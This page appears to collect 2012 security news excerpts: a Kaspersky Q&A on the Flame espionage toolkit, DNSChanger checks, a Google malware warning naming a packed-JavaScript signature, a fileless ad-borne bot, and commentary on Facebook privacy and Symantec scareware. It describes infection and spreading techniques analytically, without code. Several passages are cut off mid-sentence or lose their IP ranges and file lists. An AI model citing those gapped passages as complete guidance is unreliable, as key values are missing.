    I discovered after quite a bit of frustration that if you can download the Unhide.exe program onto a flash drive in a folder and then insert it into one of your USB ports, you will get the OPEN WITH "box" to come up. You can then go to open the folder at the bottom of the list, click on it and when it opens, click on the unhide.exe program. it takes a bit, but be patient. It will unhide all of your desktop icons so you can go do a system restore. Just make sure you don't restore it on the day you had the malware show up or you will be back to square one. I know..I got a bit hasty and did just that accidently.
  • [Jul 29, 2012] Security Shield

    I recommend to use Softpanorama Malware Defense Strategy

    One of the rogue anti-spyware programs from FakeVimes malware family, Windows Safety Wizard, is a fake security application that takes on the form and supposed capabilities of genuine anti-malware software. While Windows Safety Wizard is promoted as a quick fix-all solution to virus, Trojan, spyware and rootkit infestations and threats, Windows Safety Wizard is nothing more than a scamware designed to mislead PC users and web surfers. Functioning in the same way as its clones like Windows Ultimate Security Patch, Windows Activity Debugger, Windows Premium Guard and Windows Pro Rescuer, Windows Safety Wizard is created by cybercriminals who are motivated by easy profit, without offering anything valuable in exchange for it.

    Remove Security Shield manually

    Another method to remove Security Shield is to manually delete Security Shield files in your system. Detect and remove the following Security Shield files:


    Other Files

    Registry Keys

    See also

    [Jul 23, 2012] The Onion Facebook Is CIA's Dream Come True [SATIRE] by Stan Schroeder

    Compare with Assange- Facebook, Google, Yahoo spying tools for US intelligence

    As the "single most powerful tool for population control," the CIA's "Facebook program" has dramatically reduced the agency's costs - at least according to the latest "report" from the satirical mag The Onion.

    Perhaps inspired by a recent interview with WikiLeaks founder Julian Assange, who called Facebook "the most appalling spy machine that has ever been invented," The Onion's video fires a number of arrows in Facebook's direction - with hilarious results.

    In the video, Facebook founder Mark Zuckerberg is dubbed "The Overlord" and is shown receiving a "medal of intelligence commendation" for his work with the CIA's Facebook program.

    The Onion also takes a jab at FarmVille (which is responsible for "pacifying" as much as 85 million people after unemployment rates rose), Twitter (which is called useless as far as data gathering goes), and Foursquare (which is said to have been created by Al Qaeda).

    Check out the video below and tell us in the comments what you think.

    CIA's 'Facebook' Program Dramatically Cut Agency's Costs Onion News Network

    [Jul 08, 2012] DNS-changer-malware

    DNSChanger malware causes a computer to use rogue DNS servers in one of two ways. First, it changes the computer's DNS server settings to replace the ISP's good DNS servers with rogue DNS servers operated by the crimi evices use from the ISP's good DNS servers to rogue DNS servers operated by the criminals. This is a change that may impact all computers on the SOHO network, even if those computers are not infected with the malware.

    ... ... ...

    To determine if a computer is using rogue DNS servers, it is necessary to check the DNS server settings on the computer. If the computer is connected to a wireless access point or router, the settings on those devices should be checked as well.

    ... ... ...

    To make the comparison between the computer's DNS servers and this table easier, start by comparing the first number before the first dot. For example, if your DNS servers do not start with 85, 67, 93, 77, 213, or 64, you can move on to the next step. If your servers start with any of those numbers, continue the comparison.

    Rogue DNS Servers

    If your computer is configured to use one or more of the rogue DNS servers, it may be infected with DNSChanger malware. Home computers with high-speed Internet connections and office computers typically obtain their IP settings via DHCP from a device on the network. In these cases, the computers are provided with an IP address, default gateway, and DNS server settings. The IP addresses usually fall into one of three ranges of private addresses- to; to; and to In most homes, computers are assigned an IP address in the range to, and the default gateway and DNS servers are set to To determine if your computer is utilizing the rogue DNS servers, read the next section, Checking the Router.

    ... ... ...

    In addition to directing your computer to utilize rogue DNS servers, the DNSChanger malware may have prevented your computer from obtaining operating system and anti-malware updates, both critical to protecting your computer from online threats. This behavior increases the likelihood of your computer being infected by additional malware. The criminals who conspired to infect computers with this malware utilized various methods to spread the infections. At this time, there is no single patch or fix that can be downloaded and installed to remove this malware. Individuals who believe their computer may be infected should consult a computer professional. Individuals who do not have a recent back-up of their important documents, photos, music, and other files should complete a back-up before attempting to clean the malware or utilize the restore procedures that may have been packaged with your computer. Information regarding malicious software removal can be found at the website of the United States Computer Emergency Readiness Team: .

    [May 31, 2012] The Flame Questions and Answers by Aleks, Kaspersky Lab Expert

    May 28 | Securelist

    Duqu and Stuxnet raised the stakes in the cyber battles being fought in the Middle East – but now we've found what might be the most sophisticated cyber weapon yet unleashed. The 'Flame' cyber espionage worm came to the attention of our experts at Kaspersky Lab after the UN's International Telecommunication Union came to us for help in finding an unknown piece of malware which was deleting sensitive information across the Middle East.

    While searching for that code – nicknamed Wiper – we discovered a new malware codenamed Worm.Win32.Flame.

    Flame shares many characteristics with notorious cyber weapons Duqu and Stuxnet: while its features are different, the geography and careful targeting of attacks coupled with the usage of specific software vulnerabilities seems to put it alongside those familiar 'super-weapons' currently deployed in the Middle East by unknown perpetrators. Flame can easily be described as one of the most complex threats ever discovered. It's big and incredibly sophisticated. It pretty much redefines the notion of cyberwar and cyberespionage.

    For the full low-down on this advanced threat, read on…

    General Questions

    What exactly is Flame? A worm? A backdoor? What does it do?

    Flame is a sophisticated attack toolkit, which is a lot more complex than Duqu. It is a backdoor, a Trojan, and it has worm-like features, allowing it to replicate in a local network and on removable media if it is commanded so by its master.

    The initial point of entry of Flame is unknown - we suspect it is deployed through targeted attacks; however, we haven't seen the original vector of how it spreads. We have some suspicions about possible use of the MS10-033 vulnerability, but we cannot confirm this now.

    Once a system is infected, Flame begins a complex set of operations, including sniffing the network traffic, taking screenshots, recording audio conversations, intercepting the keyboard, and so on. All this data is available to the operators through the link to Flame's command-and-control servers.

    Later, the operators can choose to upload further modules, which expand Flame's functionality. There are about 20 modules in total and the purpose of most of them is still being investigated.

    How sophisticated is Flame?

    First of all, Flame is a huge package of modules comprising almost 20 MB in size when fully deployed. Because of this, it is an extremely difficult piece of malware to analyze. The reason why Flame is so big is because it includes many different libraries, such as for compression (zlib, libbz2, ppmd) and database manipulation (sqlite3), together with a Lua virtual machine.

    Lua is a scripting (programming) language, which can very easily be extended and interfaced with C code. Many parts of Flame have high order logic written in Lua -- with effective attack subroutines and libraries compiled from C++.

    The effective Lua code part is rather small compared to the overall code. Our estimation of development 'cost' in Lua is over 3000 lines of code, which for an average developer should take about a month to create and debug.

    Also, there are internally used local databases with nested SQL queries, multiple methods of encryption, various compression algorithms, usage of Windows Management Instrumentation scripting, batch scripting and more.

    Running and debugging the malware is also not trivial as it's not a conventional executable application, but several DLL files that are loaded on system boot.

    Overall, we can say Flame is one of the most complex threats ever discovered.

    How is this different to or more sophisticated than any other backdoor Trojan? Does it do specific things that are new?

    First of all, usage of Lua in malware is uncommon. The same goes for the rather large size of this attack toolkit. Generally, modern malware is small and written in really compact programming languages, which make it easy to hide. The practice of concealment through large amounts of code is one of the specific new features in Flame.

    The recording of audio data from the internal microphone is also rather new. Of course, other malware exists which can record audio, but key here is Flame's completeness - the ability to steal data in so many different ways.

    Another curious feature of Flame is its use of Bluetooth devices. When Bluetooth is available and the corresponding option is turned on in the configuration block, it collects information about discoverable devices near the infected machine. Depending on the configuration, it can also turn the infected machine into a beacon, and make it discoverable via Bluetooth and provide general information about the malware status encoded in the device information.

    What are the notable info-stealing features of Flame?

    Although we are still analyzing the different modules, Flame appears to be able to record audio via the microphone, if one is present. It stores recorded audio in compressed format, which it does through the use of a public-source library.

    Recorded data is sent to the C&C through a covert SSL channel, on a regular schedule. We are still analyzing this; more information will be available on our website soon.

    The malware has the ability to regularly take screenshots; what's more, it takes screenshots when certain "interesting" applications are run, for instance, IM's. Screenshots are stored in compressed format and are regularly sent to the C&C server - just like the audio recordings.

    We are still analyzing this component and will post more information when it becomes available.

    When was Flame created?

    The creators of Flame specially changed the dates of creation of the files in order that any investigators couldn't establish the truth re time of creation. The files are dated 1992, 1994, 1995 and so on, but it's clear that these are false dates.

    We consider that in the main the Flame project was created no earlier than in 2010, but is still undergoing active development to date. Its creators are constantly introducing changes into different modules, while continuing to use the same architecture and file names. A number of modules were either created of changed in 2011 and 2012.

    According to our own data, we see use of Flame in August 2010. What's more, based on collateral data, we can be sure that Flame was out in the wild as early as in February to March 2010. It's possible that before then there existed earlier version, but we don't have data to confirm this; however, the likelihood is extremely high.

    Why is it called Flame? What is the origin of its name?

    The Flame malware is a large attack toolkit made up of multiple modules. One of the main modules was named Flame - it's the module responsible for attacking and infecting additional machines.

    Is this a nation-state sponsored attack or is it being carried out by another group such as cyber criminals or hacktivisits?

    Currently there are three known classes of players who develop malware and spyware: hacktivists, cybercriminals and nation states. Flame is not designed to steal money from bank accounts. It is also different from rather simple hack tools and malware used by the hacktivists. So by excluding cybercriminals and hacktivists, we come to conclusion that it most likely belongs to the third group. In addition, the geography of the targets (certain states are in the Middle East) and also the complexity of the threat leaves no doubt about it being a nation state that sponsored the research that went into it.

    Who is responsible?

    There is no information in the code or otherwise that can tie Flame to any specific nation state. So, just like with Stuxnet and Duqu, its authors remain unknown.

    Why are they doing it?

    To systematically collect information on the operations of certain nation states in the Middle East, including Iran, Lebanon, Syria, Israel and so on. Here's a map of the top 7 affected countries:

    Is Flame targeted at specific organizations, with the goal of collecting specific information that could be used for future attacks? What type of data and information are the attackers looking for?

    From the initial analysis, it looks like the creators of Flame are simply looking for any kind of intelligence - e-mails, documents, messages, discussions inside sensitive locations, pretty much everything. We have not seen any specific signs indicating a particular target such as the energy industry - making us believe it's a complete attack toolkit designed for general cyber-espionage purposes.

    Of course, like we have seen in the past, such highly flexible malware can be used to deploy specific attack modules, which can target SCADA devices, ICS, critical infrastructure and so on.

    What industries or organizations is Flame targeting? Are they industrial control facilities/PLC/SCADA? Who are the targets and how many?

    There doesn't seem to be any visible pattern re the kind of organizations targeted by Flame. Victims range from individuals to certain state-related organizations or educational institutions. Of course, collecting information on the victims is difficult because of strict personal data collecting policies designed to protect the identity of our users.

    Based on your analysis, is this just one variation of Flame and there are others?

    Based on the intelligence received from the Kaspersky Security Network, we are seeing multiple versions of the malware being in the wild - with different sizes and content. Of course, assuming the malware has been in development for a couple of years, it is expected that many different versions will be seen in the wild.

    Additionally, Flame consists of many different plug-ins – up to 20 – which have different specific roles. A specific infection with Flame might have a set of seven plugins, while another infection might have 15. It all depends on the kind of information that is sought from the victim, and how long the system was infected with Flame.

    Is the main C&C server still active? Is there more than one primary C&C server? What happens when an infected machine contacts the C&C server?

    Several C&C servers exist, scattered around the world. We have counted about a dozen different C&C domains, run on several different servers. There could also be other related domains, which could possibly bring the total to around 80 different domains being used by the malware to contact the C&C. Because of this, it is really difficult to track usage of deployment of C&C servers.

    Was this made by the Duqu/Stuxnet group? Does it share similar source code or have other things in common?

    In size, Flame is about 20 times larger than Stuxnet, comprising many different attack and cyber-espionage features. Flame has no major similarities with Stuxnet/Duqu.

    For instance, when Duqu was discovered, it was evident to any competent researcher that it was created by the same people who created Stuxnet on the "Tilded" platform.

    Flame appears to be a project that ran in parallel with Stuxnet/Duqu, not using the Tilded platform. There are however some links which could indicate that the creators of Flame had access to technology used in the Stuxnet project - such as use of the "autorun.inf" infection method, together with exploitation of the same print spooler vulnerability used by Stuxnet, indicating that perhaps the authors of Flame had access to the same exploits as Stuxnet's authors.

    On the other hand, we can't exclude that the current variants of Flame were developed after the discovery of Stuxnet. It's possible that the authors of Flame used public information about the distribution methods of Stuxnet and put it to work in Flame.

    In summary, Flame and Stuxnet/Duqu were probably developed by two separate groups. We would position Flame as a project running parallel to Stuxnet and Duqu.

    You say this was active since March 2010. That is close to the time when Stuxnet was discovered. Was this being used in tandem with Stuxnet? It is interesting they both exploit the printer-spooler vulnerability.

    One of the best pieces of advice in any kind of operation is not to put all your eggs in one basket. Knowing that sooner or later Stuxnet and Duqu would be discovered, it would make sense to produce other similar projects - but based on a completely different philosophy. This way, if one of the research projects is discovered, the other one can continue unhindered.

    Hence, we believe Flame to be a parallel project, created as a fallback in case some other project is discovered.

    In your analysis of Duqu you mentioned "cousins" of Duqu, or other forms of malware that could exist. Is this one of them?

    Definitely not. The "cousins" of Duqu were based on the Tilded platform, also used for Stuxnet. Flame does not use the Tilded platform.

    This sounds like an info-stealing tool, similar to Duqu. Do you see this as part of an intelligence-gathering operation to make a bigger cyber-sabotage weapon, similar to Stuxnet?

    The intelligence gathering operation behind Duqu was rather small-scale and focused. We believe there were less than 50 targets worldwide for Duqu - all of them, super-high profile.

    Flame appears to be much, much more widespread than Duqu, with probably thousands of victims worldwide.

    The targets are also of a much wider scope, including academia, private companies, specific individuals and so on.

    According to our observations, the operators of Flame artificially support the quantity of infected systems on a certain constant level. This can be compared with a sequential processing of fields – they infect several dozen, then conduct analysis of the data of the victim, uninstall Flame from the systems that aren't interesting, leaving the most important ones in place. After which they start a new series of infections.

    What is Wiper and does it have any relation to Flame? How is it destructive and was it located in the same countries?

    The Wiper malware, which was reported on by several media outlets, remains unknown. While Flame was discovered during the investigation of a number of Wiper attacks, there is no information currently that ties Flame to the Wiper attacks. Of course, given the complexity of Flame, a data wiping plugin could easily be deployed at any time; however, we haven't seen any evidence of this so far.

    Additionally, systems which have been affected by the Wiper malware are completely unrecoverable - the extent of damage is so high that absolutely nothing remains that can be used to trace the attack.

    There is information about Wiper incidents only in Iran. Flame was found by us in different countries of the region, not only Iran.

    Functionality/Feature Questions about the Flame Malware

    What are the ways it infects computers? USB Sticks? Was it exploiting vulnerabilities other than the print-spooler to bypass detection? Any 0-Days?

    Flame appears to have two modules designed for infecting USB sticks, called "Autorun Infector" and "Euphoria". We haven't seen them in action yet, maybe due to the fact that Flame appears to be disabled in the configuration data. Nevertheless, the ability to infect USB sticks exists in the code, and it's using two methods:

    1. Autorun Infector: the "Autorun.inf" method from early Stuxnet, using the "shell32.dll" "trick". What's key here is that the specific method was used only in Stuxnet and was not found in any other malware since.
    2. Euphoria: spread on media using a "junction point" directory that contains malware modules and an LNK file that trigger the infection when this directory is opened. Our samples contained the names of the files but did not contain the LNK itself.
    In addition to these, Flame has the ability to replicate through local networks. It does so using the following:
    1. The printer vulnerability MS10-061 exploited by Stuxnet - using a special MOF file, executed on the attacked system using WMI.
    2. Remote jobs tasks.
    3. When Flame is executed by a user who has administrative rights to the domain controller, it is also able to attack other machines in the network: it creates backdoor user accounts with a pre-defined password that is then used to copy itself to these machines.

    [May 31, 2012] Flame anatomy of a super-virus


    Some facts

    Espionage capabilities


    [May 31, 2012] Understanding the Flame Malware By Sean Michael Kerner

    May 29, 2012 | eSecurity Planet

    Known by the names Flame, Flamer, and sKyWIper, the malware is significantly more complex then either Stuxnet or Duqu -- and it appears to be targeting the same part of the world, namely the Middle East.

    Preliminary reports from various security researchers indicate that Flame likely is a cyberwarfare weapon designed by a nation-state to conduct highly targeted espionage. Using a modular architecture, the malware is capable of performing a wide variety of malicious functions -- including spying on users' keystrokes, documents, and spoken conversations.

    Vikram Thakur, principal research manager at Symantec Security Response, told eSecurity Planet that his firm was tipped off to the existence of Flamer by Hungarian research group CrySys (Laboratory of Cryptography and System Security). As it turned out, Symantec already had the Flamer malware (known to Symantec as W32.Flamer) in their database as it had been detected using a generic anti-virus signature. "Our telemetry tracked it back at least two years," Thakur said. "We're still digging in to see if similar files existed even prior to 2010."

    Dave Marcus, Director of Security Research for McAfee Labs, told eSecurity Planet that Flamer shows the characteristics of a targeted attack.

    "With targeted attacks like Flamer, they are by nature not prevalent and not spreading out in the field," Marcus said. "It's not spreading like spam, it's very targeted, so we've only seen a handful of detections globally."

    While the bulk of all infections are in the Middle East, Marcus noted that he has seen command-and-control activity in other areas of the world. Generally speaking, malware command and control servers are rarely located in the same geographical region where the malware outbreaks are occuring, Marcus noted.

    The indications that Flamer may have escaped detection for several years is a cause for concern for many security experts.

    "To me, the idea that this might have been around for some years is the most alarming aspect of the whole thing," Roger Thompson, chief emerging threats researcher at ICSA Labs, told eSecurity Planet. "The worst hack is the one you don't know about. In the fullness of time, it may turn out that this is just a honking great banking Trojan, but it's incredibly dangerous to have any malicious code running around in your system, because it's no longer your system -- it's theirs."

    Complex and Scalable Code

    Although it is still early days in the full analysis of Flamer, one thing is clear -– the codebase is massive.

    "Flamer is the largest piece of malware that we've ever analyzed," said Symantec's Thakur. "It could take weeks if not months to actually go through the whole thing."

    McAfee's Marcus noted that most of the malware he encounters is in the 1 MB to 3 MB range, whereas Flamer is 30 MB or more.

    "You're literally talking about an order of complexity that is far greater than anything we have run into in a while," Marcus said.

    Flamer has an architecture that implies the original design intent was to ensure modular scalability, noted Thakur: "They used a lot of different types of encryption and coding techniques and they also have a local database built in."

    With its local database, Flamer could potentially store information taken from devices not connected to the Internet.

    "If the worm is able to make it onto a device that is not on the Internet, it can store all the data in the database which can then be transferred to a portable device and then moved off to a command and control server at some point in the future," Thakur said.

    Portions of Flamer are written in the open-source Lua programming language, which Thakur notes is interesting in that Lua is very portable and could potentially run on a mobile phone. Flamer also uses SSH for secure communications with its command-and-control infrastructure.

    Thakur noted that Symantec's research team is trying to trace Flamer back to its origin, but cautioned that it will be a long analytical process. Symantec researchers will dig through all of their databases in an attempt to find any piece of evidence that may be linked to any of the threats exposed by Flamer.

    "It's a very difficult job and it's not an exact science," Thakur said.

    [Apr 19, 2012] Google warns 20,000 websites they could be infected with malware -

    April 19, 2012 | Computerworld

    Google has warned 20,000 websites that they might be hacked and injected with JavaScript redirect malware, Google said.

    In a message sent this week, Google said some pages of the website may be hacked. "Specifically, we think that JavaScript has been injected into your site by a third party and may be used to redirect users to malicious sites," the Google Search Quality team said. The team said files are infected with unfamiliar JavaScript and warned that site owners should search for files containing "eval(function(p,a,c,k,e,r)" in particular. The code may be placed in HTML, JavaScript or PHP files, Google said.

    Websites were also warned that server configuration files could have been compromised."As a result of this, your site may be cloaking and showing the malicious content only in certain situations," Google said. It emphasized that it is important to remove the malware and fix the vulnerability to protect site visitors. Webmasters were also urged to keep their software up-to-date and to contact their Web hosts for technical support.

    It is not the first time Google has warned website owners to look for malware infections, Google spokesman Mark Jansen said in an email. "It's part of our ongoing mission to be transparent with webmasters and do our bit to help prevent spam," he said. "In fact this isn't a new phenomenon; we communicate very openly with webmasters and always have done."

    Google's anti-malware campaigns can have a big impact. Last July Google excluded more than 11 million URLs from the "" domain, because they were regularly used by cybercriminals to spread antivirus programs and conduct drive-by attacks. Google explained in a blog post at the time that some bulk providers could host more than 50,000 malware domains, and that it could flag whole bulk domains in severe cases.

    [Apr 14, 2012] antiphishing

    Beware unauthorised installs. See Google for more info
    Frequently asked questions

    1. What is anti-phishing?

    In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications pretending to be from popular web sites, banking sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. The Anti-phishing Domain Advisor will block and keep phishing sites away from your computer. When a site gets block you can decide to procede anyway.

    2. How can I uninstall?

    From the control panel click "Add or Remove Programs". Search for Anti-phishing Domain Advisor and click "Remove".

    3. How to determine that ADA is active?

    Visit this address to verify if your Anti-phishing Domain Advisor is active:

    If it is active you will be redirected to Panda Security

    [Apr 10, 2012] Selling You on Facebook by Jennifer Valentino-DeVries, Shayndi Raice and Courtney Schley

    "Consumers are being pinned like insects to a pinboard, the way we're being studied". From comments: "Unregulated Capitalism at its best. A feeding shark frenzy where myriads of charlatans all vie for a piece of data so they can then sell it at a profit without regard for decency, integrity, or ethics. Greed is good."

    Many popular Facebook apps are obtaining sensitive information about users-and users' friends-so don't be surprised if details about your religious, political and even sexual preferences start popping up in unexpected places.

    .... .... ....

    A Wall Street Journal examination of 100 of the most popular Facebook apps found that some seek the email addresses, current location and sexual preference, among other details, not only of app users but also of their Facebook friends. One Yahoo service powered by Facebook requests access to a person's religious and political leanings as a condition for using it. The popular Skype service for making online phone calls seeks the Facebook photos and birthdays of its users and their friends.

    ... ... ...

    This appetite for personal data reflects a fundamental truth about Facebook and, by extension, the Internet economy as a whole: Facebook provides a free service that users pay for, in effect, by providing details about their lives, friendships, interests and activities. Facebook, in turn, uses that trove of information to attract advertisers, app makers and other business opportunities.

    Up until a few years ago, such vast and easily accessible repositories of personal information were all but nonexistent. Their advent is driving a profound debate over the definition of privacy in an era when most people now carry information-transmitting devices with them all the time.

    Capitalizing on personal data is a lucrative enterprise. Facebook is in the midst of planning for an initial public offering of its stock in May that could value the young company at more than $100 billion on the Nasdaq Stock Market.

    Facebook requires apps to ask permission before accessing a user's personal details. However, a user's friends aren't notified if information about them is used by a friend's app. An examination of the apps' activities also suggests that Facebook occasionally isn't enforcing its own rules on data privacy.

    What they Know A Wall Street Journal Investigation ..Among the possible transgressions of Facebook policies that the Journal identified:

    •The app that sought the widest array of personal information of the 100 examined, "MyPad for iPad," has a two-paragraph privacy policy that says it is "adding Privacy settings shortly." Privacy policies that describe how they collect, use and share data are required by Facebook. The app maker couldn't be reached for comment.

    •Dozens of apps allow advertisers that haven't been approved by Facebook within their apps, which enables advertisers including Google to track users of the apps, according to data collected by PrivacyChoice, which offers privacy services. Google said app-makers control which technology they use to deliver online ads.

    ... ... ...

    It is no surprise, of course, that Facebook can gain deep knowledge of people's lives. It is, after all, a social network where users voluntarily share their names, closest friendships, snapshots, sexual preferences ("interested in men," "interested in women"), schools attended and countless other details, including moment-to-moment thoughts in the form of "status updates."

    This kind of information is the coin of the realm in the personal-data economy. The $28 billion online advertising industry is fueled largely by data collected about users' Web behavior that allow advertisers to create customized ads.

    [Mar 19, 2012] A unique 'fileless' bot attacks news site visitors - Securelist

    In early March, we received a report from an independent researcher on mass infections of computers on a corporate network after users had visited a number of well-known Russian online information resources. The symptoms were the same in each case: the computer sent several network requests to third-party resources, after which, in some cases, several encrypted files appeared on the hard drive.

    The infection mechanism used by this malware proved to be very difficult to identify. The websites used to spread the infection are hosted on different platforms and have different architectures. None of our attempts to reproduce the infections were successful. A quick analysis of KSN statistics that might help to identify the connection between compromised resources and the malicious code being distributed did not yield any results, either. However, we did manage to find something that the news sites had in common.

    Infection sources

    For purposes of analysis, we selected two information resources which we knew had been used to distribute the malware- (a major Russian news agency) and (a popular online newspaper). Regularly saving the contents of these resources did not identify any third-party JS scripts occasionally showing up, iframe tags, 302 errors or any other formal attributes indicating that the resources have been compromised. The only thing they had in common was that they both used AdFox advertisement management system codes, through which teaser exchange was arranged.

    We discovered that the malware is loaded via the teasers on

    Here is how the infection was carried out. A JS script for one of the teasers loaded on the site included an iframe that redirected the user to a malicious site in the .EU domain containing a Java exploit.

    Analysis of the exploit's JAR file demonstrated that it exploits a Java vulnerability (CVE-2011-3544). Cybercriminals have been exploiting this vulnerability since November in attacks targeting both MacOS and Windows users. Exploits for this vulnerability are currently among the most effective and are included in popular exploit packs.

    However, the exploit used in this case was unique and had not been included in any exploit packs: the cybercriminals used their own payload in the attack.

    [Feb 15, 2012] Wired Opinion Cyberwar Is the New Yellowcake Threat Level

    Cybersecurity is a big and booming industry. The U.S. government is expected to spend $10.5 billion a year on information security by 2015, and analysts have estimated the worldwide market to be as much as $140 billion a year. The Defense Department has said it is seeking more than $3.2 billion in cybersecurity funding for 2012. Lockheed Martin, Boeing, L-3 Communications, SAIC, and BAE Systems have all launched cybersecurity divisions in recent years. Other traditional defense contractors, such as Northrop Grumman, Raytheon, and ManTech International, have invested in information security products and services. We should be wary of proving Eisenhower right again in the cyber sphere.

    Before enacting sweeping changes to counter cyber threats, policy makers should clear the air with some simple steps.

    Stop the apocalyptic rhetoric. The alarmist scenarios dominating policy discourse may be good for the cybersecurity-industrial complex, but they aren't doing real security any favors.

    Declassify evidence relating to cyber threats. Overclassification is a widely acknowledged problem, and declassification would allow the public to verify the threats rather than blindly trusting self-interested officials.

    Disentangle the disparate dangers that have been lumped together under the "cybersecurity" label. This must be done to determine who is best suited to address which threats. In cases of cybercrime and cyberespionage, for instance, private network owners may be best suited and have the best incentives to protect their own valuable data, information, and reputations.


    The government keeps trumpeting about how cybersecurity is essential, but they have very, very little to show that their networks are actually secure. And it's not like cybersecurity suddenly became a concern in the last few years.

    Bradley Manning stole stuff from supposedly secure SIPR, they got a virus in their drones at Creech, Anonymous listens in on FBI conference calls, undoubtedly there's foreign espionage...There are countless more examples.

    Gov. really dropped the ball here and if they were serious about security, they would've implemented tighter controls a long time ago. But what do they do to resolve this? I'm sure there'll be tons of arguing about how security should be implemented, which protocols to use, Agency A doesn't like the way Agency B wants to set up its security, etc., etc., and it'll be years before anything of substance is actually done.

    And to think, many of the people who'll be tasked with making these decisions don't really "get" the internet or networks in general (It's a series of tubez! It's like two cans on a digital string, a digitized pony express! I don't use email!), and the impacts of cybersecurity in particular (Our hacker Marines will storm the digital beachhead, keyboards blazing!).


    Your last paragraph touches on the biggest problem. The 'decision makers' in this case are the absolute WORST POSSIBLE choice for addressing cyber security. Their legislation is likely to be misdirected, unintentionally because of their lack of any real knowledge of the subject matter, and intentionally by the lobbyists who will lead them to federally fund their employers who will want large $$$ to solve problems that do not exist. . In the middle of it all are the civil liberties of the citizens, which will be trampled because there is money to be made fleecing ignorant congress critters.

    [Feb 15, 2012] 11 tips for social networking safety

    It's better not to use Facebook, this is a stupid idea in any case.
    Microsoft Protect

    Use caution when you click links that you receive in messages from your friends on your social website. Treat links in messages on these sites as you would links in email messages. (For more information, see Approach links in email with caution and Click Fraud: Cybercriminals want you to 'like' it.)

    [Feb 14, 2012] Breaches galore as Cryptome hacked to infect visitors with malware

    A breach that caused to infect visitors with virulent malware was one of at least six attacks reported to hit high-profile sites or services in the past few days. Others affected included Ticketmaster, websites for Mexico and the state of Alabama, Dutch ISP KPN, and the Microsoft store in India.

    Cryptome, a repository of leaked documents and other information concerning free speech, privacy and cryptography, was attacked by hackers who left code on its servers that attempted to infect visitors using Windows PCs with a trojan spawned by the Blackhole Toolkit, the website reported on Sunday.

    Cryptome founder John Young said in an e-mail that he believes the attackers were able to infect his website with a poisoned PHP file by exploiting a weakness in security or server software provided by Network Solutions, which hosts the Cryptome website.

    ... ... ...

    Word of the compromise came as at least five other high-profile sites and services were also reported to have had their security breached. They include government websites for Mexico and the state of Alabama, the Dutch ISP KPN, the UK arm of Ticketmaster, and the Microsoft store in India. Members of the loosely organized hacker collective Anonymous reportedly took credit for a denial-of-service attack that took out US government's CIA website and then backed away from the claim.

    Worm steals 45,000 Facebook login credentials, infects victims' friends by Jon Brodkin

    January 5, 2012

    A worm previously used to commit financial fraud is now stealing Facebook login credentials, compromising at least 45,000 Facebook accounts with the goals of transmitting malicious links to victims' friends and gaining remote access to corporate networks.

    The security company Seculert has been tracking the progress of Ramnit, a worm first discovered in April 2010, and described by Microsoft as "multi-component malware that infects Windows executable files, Microsoft Office files and HTML files" in order to steal "sensitive information such as saved FTP credentials and browser cookies." Ramnit has previously been used to "bypass two-factor authentication and transaction signing systems, gain remote access to financial institutions, compromise online banking sessions and penetrate several corporate networks," Seculert says.

    Recently, Seculert set up a sinkhole and discovered that 800,000 machines were infected between September and December. Moreover, Seculert found that more than 45,000 Facebook login credentials, mostly in the UK and France, were stolen by a new variant of the worm.

    "We suspect that the attackers behind Ramnit are using the stolen credentials to log-in to victims' Facebook accounts and to transmit malicious links to their friends, thereby magnifying the malware's spread even further," Seculert said. "In addition, cybercriminals are taking advantage of the fact that users tend to use the same password in various web-based services (Facebook, Gmail, Corporate SSL VPN, Outlook Web Access, etc.) to gain remote access to corporate networks."

    Facebook fraud, of course, is nothing new. Facebook itself has acknowledged seeing 600,000 compromised logins each day, although that accounts for just 0.06 percent of the 1 billion daily Facebook logins each day.

    [Jan 12, 2012] Symantec Sued For Running Fake malware-scans


    "James Gross, a resident of Washington State, filed what he intends to be a class action lawsuit against Symantec in a Northern District California court Tuesday, claiming that Symantec defrauds consumers by running fake scans on their machines, with results designed to bully users into upgrading to a paid version of the company's software. 'The scareware does not conduct any actual diagnostic testing on the computer,' the complaint reads. 'Instead, Symantec intentionally designed its scareware to invariably report, in an extremely ominous manner, that harmful errors, privacy risks, and other computer problems exist on the user's PC, regardless of the real condition of the consumer's computer.'

    Symantec denies those claims, but it has a history of using fear mongering tactics to bump up its sales. A notice it showed in 2010 to users whose subscriptions were ending in 2010 warned that 'cyber-criminals are about to clean out your bank account...Protect yourself now, or beg for mercy.'"

    hcs_$reboot (1536101)

    A number of users reported that after installing Symantec anti-viruses their system was slower, could detect false-positives, or worse, hang. So in a way, the "scareware" is not totally wrong, as it warns about a degraded system - which may well be the case after the full product is installed.

    DCTech (2545590)

    There are perfectly good free antivirus programs now, if you want to run one. Most of them are actually better than the non-free antivirus programs. Microsoft Security Essentials [] is a free antivirus that is many times better than Symantec's and others. On top of that it is lightweight and fast, compared to the bloated crap that Norton is. It works on slower machines too, detects more viruses and doesn't break stuff.

    On 8 June 2011, PC Advisor listed Microsoft Security Essentials 2.0 in its article Five of the Best Free Security Suites, which included Avast! 6 Free Edition, Comodo Antivirus 5.4, AVG Antivirus 2011 and BitDefender Total Security 2012 Beta.

    So choose from those. Personally I don't run any antivirus as I don't download random executables from the internet nor surf to random porn sites or download from torrent sites. Windows is also secure now a days, and I haven't had a single malware in like 10 years.

    RogueyWon (735973)
    I'm by no means anti-MS (Windows 7 is the only OS on both of my home PCs these days), but I'd take issue with the blanket statement that "Windows is also secure now a days".

    I went through endless fun thanks to the parents just before Christmas. They fell for one of those fake-DHL-shipping-notice spam e-mails (as they were actually expecting a Christmas-related DHL delivery) and, with a single click, landed their (3 month old, Norton-"protected", UAC-enabled) PC with one of the most vicious and persistent pieces of malware I've ever seen. One of those fake-AV-software ransomware jobbies. It disabled Norton, blocked Windows from accessing DVD and USB drives, did a dns redirect so that browsers could only access the ransomware page and all kinds of crap. I've sorted these before by doing a system restore from a backup point in safe-mode, but even though the restore allegedly worked in this case, the malware persisted through it quite happily. Ended up doing a full format and reinstall of Windows.

    Now, there are a lot of failures in this story; my parents for clicking the link, Norton for being completely (and predictably) useless and so on. But I still have problems with describing an OS where a single click can land you in that kind of mess as "secure".

    Personally, I use AVG, on the grounds that it provides some basic protection and makes my system chug less than most of its rivals. But it's by no means infallible, throws up a depressing number of false positives and the only way to avoid infection does appear to be abject paranoia (which is now my default policy).

    tnk1 (899206)

